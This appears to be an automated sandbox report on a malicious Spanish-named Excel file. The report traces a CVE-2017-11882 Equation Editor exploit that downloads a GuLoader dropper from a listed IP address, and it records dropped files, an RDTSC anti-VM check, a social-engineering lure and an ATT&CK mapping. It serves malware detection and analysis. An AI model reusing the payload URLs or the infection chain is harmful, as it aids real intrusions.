Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://www.nero.com
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr	String found in binary or memory: https://github.com/dotnet/runtime
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869A5E80.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D05C4 URLDownloadToFileW,

Source: global traffic

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE

Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: enable Editing a Extract: ARMOURY CRATE CGPU Product.exe 15 r~m0mmbq 'bove to v Extract: APPEASINGL
Source: Screenshot number: 8	Screenshot OCR: enable Editing and Content from the Yellow bar 15 r~m0mmbq . 'bove to view locked content. " ' J"'
Source: Document image extraction number: 1	Screenshot OCR: enable Editing and Content from the Yellow bar above to view locked content. '0 p Search eloper
Source: Document image extraction number: 2	Screenshot OCR: enable Editing and Content from the Yellow bar above to view locked content. ' p SCMb eloper H

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\venxajlddf.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe			Jump to dropped file

Source: sheet1.xml, type: SAMPLE

Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_00406D5F
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_73BF1BFF

Source: BD3.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Process Stats: CPU usage > 98%

Source: MsMpLics.dll.4.dr	Static PE information: No import functions for PE file found
Source: lang-1045.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.IO.FileSystem.Watcher.dll.4.dr	Static PE information: No import functions for PE file found

Source: droidttrre[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: venxajlddf.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: p11-kit-trust.dll.4.dr

Static PE information: Number of sections : 11 > 10

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Memory allocated: 77740000 page execute and read and write

Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	Virustotal: Detection: 54%
Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	Metadefender: Detection: 22%
Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	ReversingLabs: Detection: 58%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe C:\Users\user\AppData\Roaming\venxajlddf.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe C:\Users\user\AppData\Roaming\venxajlddf.exe

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR77BE.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@4/21@0/1

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_004021AA CoCreateInstance,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

File written: C:\Users\user\AppData\Local\Temp\krista.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr
Source:	Binary string: System.IO.FileSystem.Watcher.ni.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr
Source:	Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr
Source:	Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr
Source:	Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Watcher\net6.0-windows-Release\System.IO.FileSystem.Watcher.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr

Source: BD3.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.1181440399.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_73BF30C0 push eax; ret

Source: p11-kit-trust.dll.4.dr

Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_73BF1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

Source: MsMpLics.dll.4.dr

Static PE information: 0xE6DA2BE7 [Wed Sep 24 01:22:47 2092 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 6.94282730477

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\lang-1045.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\avutil-54.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\venxajlddf.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

RDTSC instruction interceptor: First address: 0000000003F3284D second address: 0000000003F3284D instructions: 0x00000000 rdtsc 0x00000002 test ch, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4F04CEE131h 0x00000008 test bl, dl 0x0000000a test dh, dh 0x0000000c inc ebp 0x0000000d pushad 0x0000000e mov di, 3FC4h 0x00000012 cmp di, 3FC4h 0x00000017 jne 00007F4F04CFCB1Eh 0x0000001d popad 0x0000001e inc ebx 0x0000001f cmp ah, ch 0x00000021 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2096

Thread sleep time: -300000s >= -30000s

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lang-1045.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\avutil-54.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_0040699E FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_0040290B FindFirstFileW,

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	API call chain: ExitProcess graph end node

Source: avutil-54.dll.4.dr	Binary or memory string: yuv420pyuyv422rgb24bgr24yuv422pyuv444pyuv410pyuv411pgraygray8,y8monowmonobpal8yuvj420pyuvj422pyuvj444pxvmcmcxvmcidctuyvy422uyyvyy411bgr8bgr4bgr4_bytergb8rgb4rgb4_bytenv12nv21argbrgbaabgrbgragray16bey16begray16ley16leyuv440pyuvj440pyuva420pvdpau_h264vdpau_mpeg1vdpau_mpeg2vdpau_wmv3vdpau_vc1rgb48bergb48lergb565bergb565lergb555bergb555lebgr565bebgr565lebgr555bebgr555levaapi_mocovaapi_idctvaapi_vldyuv420p16leyuv420p16beyuv422p16leyuv422p16beyuv444p16leyuv444p16bevdpau_mpeg4dxva2_vldrgb444lergb444bebgr444lebgr444beya8gray8abgr48bebgr48leyuv420p9beyuv420p9leyuv420p10beyuv420p10leyuv422p10beyuv422p10leyuv444p9beyuv444p9leyuv444p10beyuv444p10leyuv422p9beyuv422p9levda_vldgbrpgbrp9begbrp9legbrp10begbrp10legbrp16begbrp16leyuva420p9beyuva420p9leyuva422p9beyuva422p9leyuva444p9beyuva444p9leyuva420p10beyuva420p10leyuva422p10beyuva422p10leyuva444p10beyuva444p10leyuva420p16beyuva420p16leyuva422p16beyuva422p16leyuva444p16beyuva444p16levdpauxyz12lexyz12benv16nv20lenv20beyvyu422vdaya16beya16leqsvmmald3d11va_vldrgba64bergba64lebgra64bebgra64le0rgbrgb00bgrbgr0yuva444pyuva422pyuv420p12beyuv420p12leyuv420p14beyuv420p14leyuv422p12beyuv422p12leyuv422p14beyuv422p14leyuv444p12beyuv444p12leyuv444p14beyuv444p14legbrp12begbrp12legbrp14begbrp14legbrapgbrap16begbrap16leyuvj411pbayer_bggr8bayer_rggb8bayer_gbrg8bayer_grbg8bayer_bggr16lebayer_bggr16bebayer_rggb16lebayer_rggb16bebayer_gbrg16lebayer_gbrg16bebayer_grbg16lebayer_grbg16beyuv440p10leyuv440p10beyuv440p12leyuv440p12beayuv64leayuv64bevideotoolbox_vldunknowntvpcreservedbt470mbt2020linearlog100log316iec61966-2-4bt1361eiec61966-2-1bt2020-10bt2020-20gbrycgcobt2020ncbt2020cunspecifiedleftcentertoplefttopbottomleftbottomrgb32bgr32le%s%sname nb_components nb_bits%-11s %7d %10dlibavutil/pixdesc.cd->log2_chroma_w <= 3d->log2_chroma_h <= 3d->nb_components <= 4d->name && d->name[0](d->nb_components==4 \|\| d->nb_components==2) == !!(d->flags & (1 << 7))!c->plane && !c->step_minus1 && !c->offset_plus1 && !c->shift && !c->depth_minus1c->step_minus1 >= c->depth_minus18*(c->step_minus1+1) >= c->depth_minus1+1bayer_tmp[0] == 0 && tmp[1] == 0beyuvjpixelutils support is required but libavutil is not compiled with it
Source: venxajlddf.exe, 00000004.00000002.1180587044.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: avutil-54.dll.4.dr	Binary or memory string: xvmcidct

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_73BF1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D0636 mov edx, dword ptr fs:[00000030h]

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe C:\Users\user\AppData\Roaming\venxajlddf.exe

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	Path Interception	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	13 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	22 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	121 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	15 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Scripting	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Timestomp	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	55%	Virustotal		Browse
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	23%	Metadefender		Browse
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	59%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	100%	Avira	EXP/CVE-2017-11882.Gen
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	32%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	38%	ReversingLabs	Win32.Downloader.GuLoader
C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MsMpLics.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MsMpLics.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\avutil-54.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\avutil-54.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\lang-1045.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\lang-1045.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\venxajlddf.exe	32%	Metadefender		Browse
C:\Users\user\AppData\Roaming\venxajlddf.exe	38%	ReversingLabs	Win32.Downloader.GuLoader

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.EQNEDT32.EXE.5a9b33.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://subca.ocsp-certum.com05	0%	URL Reputation	safe
http://2.56.57.22/droidttrre.exej	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://subca.ocsp-certum.com02	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
http://2.56.57.22/droidttrre.exeooC:	0%	Avira URL Cloud	safe
http://2.56.57.22/droidttrre.exe	12%	Virustotal		Browse
http://2.56.57.22/droidttrre.exe	100%	Avira URL Cloud	malware
http://www.avast.com0/	0%	URL Reputation	safe
http://2.56.57.22/droidttrre.exeP	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://2.56.57.22/yendexoriginwithoutfilter_rctcon218.bin	true		unknown
http://2.56.57.22/droidttrre.exe	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.certum.pl/ctsca2021.crl0o	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://creativecommons.org/licenses/by-sa/4.0/	folder-publicshare.png.4.dr	false		high
http://repository.certum.pl/ctnca.cer09	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false		high
